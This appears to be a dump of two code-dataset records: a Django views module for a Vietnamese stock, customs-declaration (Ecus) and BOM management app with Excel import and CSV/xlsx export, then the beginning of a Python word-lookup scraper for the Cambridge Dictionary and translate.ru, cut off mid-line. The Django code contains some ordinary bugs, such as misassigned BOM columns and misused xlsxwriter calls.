SavedSamplesCsvView(IOBListView):\n \"\"\"\n Subclass of above view, to produce a csv file\n \"\"\"\n paginate_by = None\n template_name = 'stocksmanagement/stock.csv'\n content_type = 'text/csv'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n return context\n\n\n@login_required\ndef export_csv_iob(request):\n query_set = Stock.objects.all().filter(client=request.user)\n description = request.GET.get('description', '')\n item_name = request.GET.get('item_name', '')\n content_disposition = 'attachment; filename=\"List of stock'\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n content_disposition += f' - {description}'\n if item_name:\n query_set = query_set.filter(\n item_name__icontains=item_name\n )\n content_disposition += f' - {item_name}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow(['', ' ', ' ', ' ', ' Beginning Inventory', ' ', ' ', ' PR Purchase Receipt', ' ', ' ', ' MR Production Receipt', ' ', ' ', ' OR Unplanned Receipt', ' ', ' ', ' Stock Transfer Receipt',\n ' ', ' ', ' PI Issue for production', ' ', ' ', ' 
DI Sales Issue', ' ', ' ', ' OI Unplanned Issue', ' ', ' ', ' Stock Transfer Issue', ' ', ' '])\n writer.writerow(['Item Acount Description', ' Item', ' Ecus', ' Item Description', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price',\n ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price', ' Quantity', ' Amount', ' Price'])\n for stock in query_set:\n writer.writerow(\n [\n stock.description,\n stock.item_name,\n stock.ecus_code,\n stock.item_desciption,\n stock.begin_quantity,\n stock.get_beginning_amount(),\n stock.begin_price,\n stock.pr_purchase_quantity,\n stock.get_pr_purchase_amount(),\n stock.pr_purchase_price,\n stock.mr_production_quantity,\n stock.get_mr_production_amount(),\n stock.mr_production_price,\n stock.or_unplanned_quantity,\n stock.get_or_unplanned_amount(),\n stock.or_unplanned_price,\n stock.stock_transfer_quantity,\n stock.get_stock_transfer_amount(),\n stock.stock_transfer_price,\n stock.pi_issue_production_quantity,\n stock.get_pi_issue_production_amount(),\n stock.pi_issue_production_price,\n stock.di_sale_issue_quantity,\n stock.get_di_sale_issue_amount(),\n stock.di_sale_issue_price,\n stock.oi_unplanned_issue_quantity,\n stock.get_oi_unplanned_issue_amount(),\n stock.oi_unplanned_issue_price,\n stock.stock_transfer_issue_quantity,\n stock.get_stock_transfer_amount(),\n stock.stock_transfer_issue_price,\n ]\n )\n return response\n\n\n@login_required\ndef add_items(request):\n form = StockCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_items')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_items')\n\n context = {\n 'title': 'update item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n return redirect('list_items')\n return render(request, 'stocksmanagement/confirm_delete.html', {\"title\": 'Confirm delete'})\n\n\n@login_required\ndef stock_detail(request, pk):\n queryset = Stock.objects.get(id=pk)\n context = {\n \"title\": queryset.item_name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/stock_detail.html\", context)\n\n\ndef check_format(df):\n format = ['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef 
import_excel(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel')\n try:\n imported_data = pd.read_excel(\n file_name.read(), header=10, sheet_name='IOB')\n except Exception:\n messages.warning(\n request, \"Wrong format, please make sure the file you input is excel and the sheet contain information name 'IOB'\")\n return redirect('import_excel')\n if check_format(imported_data):\n imported_data.fillna(method='ffill', inplace=True)\n for _, row in imported_data.iterrows():\n item = Stock(client=request.user)\n\n if row['Item Acount Description']:\n item.description = row['Item Acount Description'],\n if row['Item']:\n item.item_name = row['Item']\n if row['Mã Ecus']:\n item.ecus_code = row['Mã Ecus']\n if row['Item Description']:\n item.item_desciption = row['Item Description']\n if row['Quantity']:\n item.begin_quantity = row['Quantity']\n if row['Price']:\n item.begin_price = row['Price']\n if row['Quantity.1']:\n item.pr_purchase_quantity = row['Quantity.1']\n if row['Amount.1']:\n item.pr_purchase_price = row['Amount.1']\n if row['Quantity.2']:\n item.mr_production_quantity = row['Quantity.2']\n if row['Amount.2']:\n item.mr_production_price = row['Amount.2']\n if row['Quantity.3']:\n item.or_unplanned_quantity = row['Quantity.3']\n if row['Amount.3']:\n item.or_unplanned_price = row['Amount.3']\n if row['Quantity.4']:\n item.stock_transfer_quantity = row['Quantity.4']\n if row['Amount.4']:\n item.stock_transfer_price = row['Amount.4']\n if row['Quantity.5']:\n item.pi_issue_production_quantity = row['Quantity.5']\n if row['Amount.5']:\n item.pi_issue_production_price = row['Amount.5']\n if row['Quantity.6']:\n item.di_sale_issue_quantity = row['Quantity.6']\n if row['Amount.6']:\n item.di_sale_issue_price = row['Amount.6']\n if row['Quantity.7']:\n item.oi_unplanned_issue_quantity = row['Quantity.7']\n if row['Amount.7']:\n item.oi_unplanned_issue_price = row['Amount.7']\n if row['Quantity.8']:\n item.stock_transfer_issue_quantity = row['Quantity.8']\n if row['Amount.8']:\n item.stock_transfer_issue_price = row['Amount.8']\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_items')\n else:\n messages.warning(request, '''Wrong format, please make sure the excel table contains at least these columns ['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']''')\n return redirect('import_excel')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n['Item Acount Description', 'Item', 'Mã Ecus', 'Item Description',\n 'Quantity', 'Amount', 'Price', 'Quantity.1', 'Amount.1', 'Price.1',\n 'Quantity.2', 'Amount.2', 'Price.2', 'Quantity.3', 'Amount.3',\n 'Price.3', 'Quantity.4', 'Amount.4', 'Price.4', 'Quantity.5',\n 'Amount.5', 'Price.5', 'Quantity.6', 'Amount.6', 'Price.6',\n 'Quantity.7', 'Amount.7', 'Price.7', 'Quantity.8', 'Amount.8',\n 'Price.8', 'Quantity.9', 'Amount.9', 'Price.9']\n\n\n'''----------ECUS---------'''\n\n\nclass EcusListView(LoginRequiredMixin, ListView):\n model = 
Ecus\n template_name = 'stocksmanagement/list_ecus.html'\n context_object_name = 'queryset'\n ordering = ['-registered_date']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Ecus'\n return context\n\n def get_queryset(self):\n self.query_set = Ecus.objects.all().filter(client=self.request.user)\n type_code = self.request.GET.get('type_code', '')\n from_country = self.request.GET.get('from_country', '')\n if type_code:\n self.query_set = self.query_set.filter(\n type_code__icontains=type_code\n )\n if from_country:\n self.query_set = self.query_set.filter(\n from_country__icontains=from_country\n )\n return self.query_set\n\n\n@login_required\ndef export_csv_ecus(request):\n query_set = Ecus.objects.all().filter(client=request.user)\n type_code = request.GET.get('type_code', '')\n from_country = request.GET.get('from_country', '')\n content_disposition = 'attachment; filename=\"Ecus'\n if type_code:\n query_set = query_set.filter(\n type_code__icontains=type_code\n )\n content_disposition += f' - {type_code}'\n if from_country:\n query_set = query_set.filter(\n from_country__icontains=from_country\n )\n content_disposition += f' - {from_country}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow([\n 'Account Number',\n 'Registered Date',\n 'Type Code',\n 'Goods No',\n 'NPL/SP Code',\n 'ERP Code',\n 'HS',\n 'Item Name',\n 'Country',\n 'Unit Price',\n 'Taxed Price',\n 'Total',\n 'Unit',\n 'Total 2',\n 'Unit 2',\n 'NT value',\n 'Total value',\n 'Tax rate',\n 'Tax cost',\n 'Partner',\n 'Bill',\n 'Bill date',\n 'Contract',\n 'Contract date'\n ])\n for stock in query_set:\n writer.writerow(\n [\n stock.account_number,\n stock.registered_date,\n stock.type_code,\n stock.goods_no,\n stock.npl_sp_code,\n stock.erp_code,\n stock.hs,\n stock.item_name,\n stock.from_country,\n stock.unit_price,\n stock.unit_price_taxed,\n stock.total,\n stock.unit,\n stock.total_2,\n stock.unit_2,\n stock.nt_value,\n stock.total_value,\n stock.tax_rate,\n stock.tax_cost,\n stock.partner,\n stock.bill,\n stock.bill_date,\n stock.contract,\n stock.contract_date\n ]\n )\n return response\n\n\n@login_required\ndef update_ecus(request, pk):\n queryset = Ecus.objects.get(id=pk)\n form = EcusUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = EcusUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_ecus')\n\n context = {\n 'title': 'Update Item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\ndef check_ecus_format(df):\n format = ['Số TK', 'Ngày ĐK', 'Mã loại hình', 'STT hàng', 'Mã NPL/SP', 'Mã ERP', 'Mã HS', 'Tên hàng', 'Xuất xứ', 'Đơn giá', 'Đơn giá tính thuế', 'Tổng số lượng', 'Đơn vị tính',\n 'Tổng số lượng 2', 'Đơn vị tính 2', 'Trị giá NT', 'Tổng trị giá', 'Thuế suất XNK', 'Tiền thuế XNK', 'Tên đối tác', 'Số hóa đơn', 'Ngày hóa đơn', 'Số hợp đồng', 'Ngày hợp đồng']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef import_excel_ecus(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel_ecus')\n try:\n 
imported_data = pd.read_excel(\n file_name.read(), sheet_name='Ecus')\n except Exception:\n messages.warning(\n request, 'Wrong format, make sure the files you import is excel file and the sheet contain informations name Ecus')\n return render(request, 'stocksmanagement/import_excel.html')\n if check_ecus_format(imported_data):\n for _, row in imported_data.iterrows():\n item = Ecus(client=request.user)\n if not pd.isna(row['Số TK']):\n item.account_number = row['Số TK']\n if not pd.isna(row['Ngày ĐK']):\n item.registered_date = row['Ngày ĐK'].date()\n if not pd.isna(row['Mã loại hình']):\n item.type_code = row['Mã loại hình']\n if not pd.isna(row['STT hàng']):\n item.goods_no = row['STT hàng']\n if not pd.isna(row['Mã NPL/SP']):\n item.npl_sp_code = row['Mã NPL/SP']\n if not pd.isna(row['Mã ERP']):\n item.erp_code = row['Mã ERP']\n if not pd.isna(row['Mã HS']):\n item.hs = row['Mã HS']\n if not pd.isna(row['Tên hàng']):\n item.item_name = row['Tên hàng']\n if not pd.isna(row['Xuất xứ']):\n item.from_country = row['Xuất xứ']\n if not pd.isna(row['Đơn giá']):\n item.unit_price = row['Đơn giá']\n if not pd.isna(row['Đơn giá tính thuế']):\n item.unit_price_taxed = row['Đơn giá tính thuế']\n if not pd.isna(row['Tổng số lượng']):\n item.total = row['Tổng số lượng']\n if not pd.isna(row['Đơn vị tính']):\n item.unit = row['Đơn vị tính']\n if not pd.isna(row['Tổng số lượng 2']):\n item.total_2 = row['Tổng số lượng 2']\n if not pd.isna(row['Đơn vị tính 2']):\n item.unit_2 = row['Đơn vị tính 2']\n if not pd.isna(row['Trị giá NT']):\n item.nt_value = row['Trị giá NT']\n if not pd.isna(row['Tổng trị giá']):\n item.total_value = row['Tổng trị giá']\n if not pd.isna(row['Thuế suất XNK']):\n item.tax_rate = row['Thuế suất XNK']\n if not pd.isna(row['Tiền thuế XNK']):\n item.tax_cost = row['Tiền thuế XNK']\n if not pd.isna(row['Tên đối tác']):\n item.partner = row['Tên đối tác']\n if not pd.isna(row['Số hóa đơn']):\n item.bill = row['Số hóa đơn']\n if not pd.isna(row['Ngày hóa đơn']):\n item.bill_date = row['Ngày hóa đơn'].date()\n if not pd.isna(row['Số hợp đồng']):\n item.contract = row['Số hợp đồng']\n if not pd.isnull(row['Ngày hợp đồng']):\n item.contract_date = row['Ngày hợp đồng'].date()\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_ecus')\n else:\n messages.warning(request, '''Wrong format, make sure your file has at least these column ['Số TK', 'Ngày ĐK', 'Mã loại hình', 'STT hàng', 'Mã NPL/SP', 'Mã ERP', 'Mã HS', 'Tên hàng', 'Xuất xứ', 'Đơn giá', 'Đơn giá tính thuế', 'Tổng số lượng', 'Đơn vị tính',\n 'Tổng số lượng 2', 'Đơn vị tính 2', 'Trị giá NT', 'Tổng trị giá', 'Thuế suất XNK', 'Tiền thuế XNK', 'Tên đối tác', 'Số hóa đơn', 'Ngày hóa đơn', 'Số hợp đồng', 'Ngày hợp đồng']''')\n return redirect('import_excel_ecus')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n@login_required\ndef add_items_ecus(request):\n form = EcusCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_ecus')\n context = {\n \"form\": form,\n \"title\": \"Add Ecus\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items_ecus(request, pk):\n queryset = Ecus.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n return redirect('list_ecus')\n return render(request, 
'stocksmanagement/confirm_delete_ecus.html', {'title': 'Confirm delete'})\n\n\n@login_required\ndef ecus_detail(request, pk):\n queryset = Ecus.objects.get(id=pk)\n context = {\n \"title\": queryset.item_name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/ecus_detail.html\", context)\n\n\n'''------------BOM------------'''\n\n\nclass BOMListView(LoginRequiredMixin, ListView):\n model = BOM\n template_name = 'stocksmanagement/list_bom.html'\n context_object_name = 'queryset'\n # ordering = ['-date_posted']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = BOMSearchForm(self.request.GET)\n context['title'] = 'BOM'\n return context\n\n def get_queryset(self):\n self.query_set = BOM.objects.all().filter(client=self.request.user)\n ecus_code = self.request.GET.get('ecus_code', '')\n tp_code = self.request.GET.get('tp_code', '')\n ecus = self.request.GET.get('ecus', '')\n if ecus_code:\n self.query_set = self.query_set.filter(\n ecus_code__icontains=ecus_code\n )\n if tp_code:\n self.query_set = self.query_set.filter(\n tp_code__icontains=tp_code\n )\n if ecus:\n self.query_set = self.query_set.filter(\n ecus__icontains=ecus\n )\n return self.query_set\n\n\n@login_required\ndef export_csv_bom(request):\n query_set = BOM.objects.all().filter(client=request.user)\n ecus_code = request.GET.get('ecus_code', '')\n tp_code = request.GET.get('tp_code', '')\n content_disposition = 'attachment; filename=\"BOM'\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n content_disposition += f' - {ecus_code}'\n if tp_code:\n query_set = query_set.filter(\n tp_code__icontains=tp_code\n )\n content_disposition += f' - {tp_code}'\n content_disposition += '.csv\"'\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = content_disposition\n writer = csv.writer(response)\n writer.writerow(\n [\n 'Code TP',\n 'Ecus Code',\n 'Name',\n 'Decription',\n 'Unit',\n 'Ecus',\n 'Name 2',\n 'Decription',\n 'Unit',\n 'BOM',\n 'Loss',\n 'Thành phẩm xuất',\n 'Quy đổi TP xuất',\n 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn'\n ]\n )\n for stock in query_set:\n writer.writerow(\n [\n stock.tp_code,\n stock.ecus_code,\n stock.name,\n stock.description,\n stock.unit,\n stock.ecus,\n stock.name_2,\n stock.description_2,\n stock.unit_2,\n stock.bom,\n stock.loss,\n stock.finish_product,\n stock.finish_product_convert,\n stock.finish_product_inventory,\n stock.finish_product_exchange\n ]\n )\n return response\n\n\n@login_required\ndef update_bom(request, pk):\n queryset = BOM.objects.get(id=pk)\n form = BOMUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = BOMUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n return redirect('list_bom')\n\n context = {\n 'title': 'Add item',\n 'form': form\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\ndef check_bom_format(df):\n format = ['Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss', 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn']\n set1 = set(format)\n set2 = set(df.columns.tolist())\n is_subset = set1.issubset(set2)\n if not is_subset:\n return False\n return True\n\n\n@login_required\ndef import_excel_bom(request):\n if request.method == 'POST':\n try:\n file_name = request.FILES['myfile']\n except 
MultiValueDictKeyError:\n messages.warning(request, 'Please choose your file')\n return redirect('import_excel_bom')\n try:\n imported_data = pd.read_excel(\n file_name.read(), sheet_name='BOM')\n except Exception:\n messages.warning(\n request, 'Wrong format, make sure the file you import is excel and the sheet contain informations name BOM')\n return render(request, 'stocksmanagement/import_excel.html')\n if check_bom_format(imported_data):\n imported_data = imported_data.iloc[1:, :]\n for _, row in imported_data.iterrows():\n item = BOM(client=request.user)\n if not pd.isna(row['Code TP']):\n item.tp_code = row['Code TP']\n if not pd.isna(row['Mã Ecus']):\n item.ecus_code = row['Mã Ecus']\n if not pd.isna(row['Tên']):\n item.name = row['Tên']\n if not pd.isna(row['Decription']):\n item.rm_code = row['Decription']\n if not pd.isna(row['Unit']):\n item.description = row['Unit']\n if not pd.isna(row['RM.code']):\n item.unit = row['RM.code']\n if not pd.isna(row['Ecus code']):\n item.ecus = row['Ecus code']\n if not pd.isna(row['Name']):\n item.name_2 = row['Name']\n if not pd.isna(row['Decription.1']):\n item.description_2 = row['Decription.1']\n if not pd.isna(row['Unit.1']):\n item.unit_2 = row['Unit.1']\n if not pd.isna(row['BOM']):\n item.bom = row['BOM']\n if not pd.isna(row['Loss']):\n item.loss = row['Loss']\n if not pd.isna(row['Thành phẩm xuất']):\n item.finish_product = row['Thành phẩm xuất']\n if not pd.isna(row['Quy đổi TP xuất']):\n item.finish_product_convert = row['Quy đổi TP xuất']\n if not pd.isna(row['Thành phẩm tồn']):\n item.finish_product_inventory = row['Thành phẩm tồn']\n if not pd.isna(row['Quy đổi thành phẩm tồn']):\n item.finish_product_exchange = row['Quy đổi thành phẩm tồn']\n item.save()\n messages.success(request, 'Data Imported')\n return redirect('list_bom')\n else:\n messages.warning(request, '''\n Wrong format, make sure table has at least these columns:\n 'Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss', \n 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn' \n ''')\n return redirect('import_excel_bom')\n return render(request, 'stocksmanagement/import_excel.html', {'title': 'Import as excel'})\n\n\n['Code TP', 'Mã Ecus', 'Tên', 'Decription', 'Unit', 'RM.code',\n 'Ecus code', 'Name', 'Decription.1', 'Unit.1', 'BOM', 'Loss',\n 'BOM + Loss', 'Thành phẩm xuất', 'Quy đổi TP xuất', 'Thành phẩm tồn',\n 'Quy đổi thành phẩm tồn']\n\n\n@login_required\ndef add_items_bom(request):\n form = BOMCreateForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.client = request.user\n instance.save()\n messages.success(request, 'Successfully Saved')\n return redirect('list_bom')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"stocksmanagement/add_items.html\", context)\n\n\n@login_required\ndef delete_items_bom(request, pk):\n queryset = BOM.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n return redirect('list_items_bom')\n return render(request, 'stocksmanagement/confirm_delete_bom.html', {'title': 'Confirm delete'})\n\n\n@login_required\ndef bom_detail(request, pk):\n queryset = BOM.objects.get(id=pk)\n context = {\n \"title\": queryset.name,\n \"queryset\": queryset,\n }\n return render(request, \"stocksmanagement/bom_detail.html\", context)\n\n\nclass BalanceListView(LoginRequiredMixin, ListView):\n model = Balance\n template_name = 
'stocksmanagement/list_balance.html'\n context_object_name = 'queryset'\n # ordering = ['-date_posted']\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = BalanceSearchForm(self.request.GET)\n context['title'] = 'Balance'\n return context\n\n def get_queryset(self):\n query_set = Balance.objects.all().filter(client=self.request.user)\n ecus_code = self.request.GET.get('ecus_code', '')\n description = self.request.GET.get('description', '')\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n return query_set\n\n\n@login_required\ndef export_csv_balance(request):\n query_set = Balance.objects.all().filter(client=request.user)\n ecus_code = request.GET.get('ecus_code', '')\n description = request.GET.get('description', '')\n content_disposition = 'attachment; filename=\"Balance'\n if ecus_code:\n query_set = query_set.filter(\n ecus_code__icontains=ecus_code\n )\n content_disposition += f' - {ecus_code}'\n if description:\n query_set = query_set.filter(\n description__icontains=description\n )\n content_disposition += f' - {description}'\n content_disposition += '.xlsx\"'\n output = StringIO()\n workbook = xlsxwriter.Workbook(output)\n worksheet = workbook.add_worksheet()\n worksheet.write('ERP code',\n 'Ecus Code',\n 'Decription',\n 'E21',\n 'B13',\n 'A42',\n 'E52',\n 'RM Stock',\n 'FG Stock',\n 'WIP',\n 'BALANCE')\n\n for stock in query_set:\n worksheet.write(\n [\n stock.erp_code,\n stock.ecus_code,\n stock.description,\n stock.e21,\n stock.b13,\n stock.a42,\n stock.e52,\n stock.rm_stock,\n stock.fg_stock,\n stock.wip_stock,\n stock.get_balance()\n ]\n )\n\n workbook.close()\n response = HttpResponse(content_type='application/vnd.ms-excel')\n response['Content-Disposition'] = content_disposition\n response.write(output.getvalue())\n return response\n\n # query_set = Balance.objects.all().filter(client=request.user)\n # ecus_code = request.GET.get('ecus_code', '')\n # description = request.GET.get('description', '')\n # content_disposition = 'attachment; filename=\"Balance'\n # if ecus_code:\n # query_set = query_set.filter(\n # ecus_code__icontains=ecus_code\n # )\n # content_disposition += f' - {ecus_code}'\n # if description:\n # query_set = query_set.filter(\n # description__icontains=description\n # )\n # content_disposition += f' - {description}'\n # content_disposition += '.csv\"'\n # response = HttpResponse(content_type='text/csv')\n # response['Content-Disposition'] = content_disposition\n # writer = csv.writer(response)\n # writer.writerow(\n # [\n # 'ERP code',\n # 'Ecus Code',\n # 'Decription',\n # 'E21',\n # 'B13',\n # 'A42',\n # 'E52',\n # 'RM Stock',\n # 'FG Stock',\n # 'WIP',\n # 'BALANCE',\n # ]\n # )\n # for stock in query_set:\n # writer.writerow(\n # [\n # stock.erp_code,\n # stock.ecus_code,\n # stock.description,\n # stock.e21,\n # stock.b13,\n # stock.a42,\n # stock.e52,\n # stock.rm_stock,\n # stock.fg_stock,\n # stock.wip_stock,\n # stock.get_balance()\n # ]\n # )\n # return response\n","repo_name":"trinhvanminh/uni-dev","sub_path":"stocksmanagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1685071917","text":"import csv\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef check_text(message):\n text = 
message.text\n flag = True\n if ' ' in text:\n fail_message = 'Напишите только 1 слово'\n flag = False\n elif re.search(r'[^a-zA-Zа]', text):\n fail_message = 'Используйте только английские буквы'\n flag = False\n elif len(text) == 1:\n fail_message = 'Минимум 2 буквы'\n flag = False\n else:\n try:\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://dictionary.cambridge.org/us/dictionary/english/{text}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n final_keyword = soup.find('span', class_='hw dhw') # Получаем слово в простой форме\n final_keyword_string = final_keyword.string\n fail_message = 'Ошибок нет'\n\n except AttributeError:\n fail_message = 'Такого слова нет'\n flag = False\n\n return flag, fail_message\n\n\ndef get_data_from_cambridge(word_data, message):\n ''' Получаем данные о слове на Cambridge Dictionary:\n – Слово в простой форме\n – Произношение в .mp3 '''\n\n keyword = message.text.lower()\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://dictionary.cambridge.org/us/dictionary/english/{keyword}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n refined_keyword = soup.find('span', class_='hw dhw') # Получаем слово в простой форме\n keyword = refined_keyword.string\n\n search = soup.find_all(attrs={\"type\": \"audio/mpeg\"}, limit=1) # Скачиваем звук\n url_sound = 'https://dictionary.cambridge.org/' + str(search).replace('[<source src=\"/', '').replace('\" type=\"audio/mpeg\"/>]', '')\n\n response = requests.get(url_sound, headers=headers)\n with open(f'sounds/{keyword}.mp3', 'wb') as mp3:\n mp3.write(response.content)\n\n word_data.update({\n 'en': keyword,\n })\n\n return word_data, keyword\n\n\ndef get_data_from_promt(word_data, keyword):\n ''' Получаем данные о слове на Cambridge Dictionary:\n – Перевод на ру\n – Транскрипция произношения\n – Часть речи\n – Спрежение\n – Пример фраз на англ\n – Перевод фраз ан ру '''\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'\n }\n\n url = f'https://www.translate.ru/%D0%BF%D0%B5%D1%80%D0%B5%D0%B2%D0%BE%D0%B4/%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9-%D1%80%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9/{keyword}'\n\n html = requests.get(url, headers=headers)\n soup = BeautifulSoup(html.text, features='html.parser')\n\n translate = soup.find_all('span', class_='result_only sayWord', limit=2) # Получаем русские слова\n words_list = []\n for word in translate:\n words_list.append(word.string)\n ru_words = ', '.join(words_list)\n\n try:\n part_of_speech = soup.find('span', class_='ref_psp') # Получаем часть речи\n part_of_speech_string = part_of_speech.string\n except:\n part_of_speech_string = ''\n\n try:\n other_forms = 
soup.find('div', class_='otherImportantForms') # Получаем спряжения\n other_forms_string = other_forms.string.strip()\n except:\n other_forms_string = ''\n\n en_phrases_list = []\n phrases_en = soup.find_all('div', class_='samSource', limit=2) # Получаем английские фразы\n for phrase in phrases_en:\n a = str(phrase)\n a = a.replace('<div class=\"samSource\"><span style=\"color:#14426f\">', '').replace(' class=\"sourceSampleSearch\"', \"\").replace('.</span></div>', '').replace('span', 'b').replace('</div>', '')\n en_phrases_list.append(a)\n\n ru_phrases_list = []\n phrases_ru = soup.find_all('div', class_='samTranslation', limit=2) # Получаем русские фразы\n for phrase in phrases_ru:\n a = str(phrase)\n a = a.replace('<div class=\"samTranslation\"><span>', '').replace(' class=\"sourceSampleSearch\"', '').replace('.</span></div>', '').replace('</div>', '').replace('span', 'b')\n ru_phrases_list.append(a)\n\n phrases = ''\n for i in range(len(en_phrases_list)):\n phrases += en_phrases_list[i] + '<br>' + ru_phrases_list[i] + '<br><br>'\n phrases = phrases[:-8]\n\n word_data.update({\n 'ru': 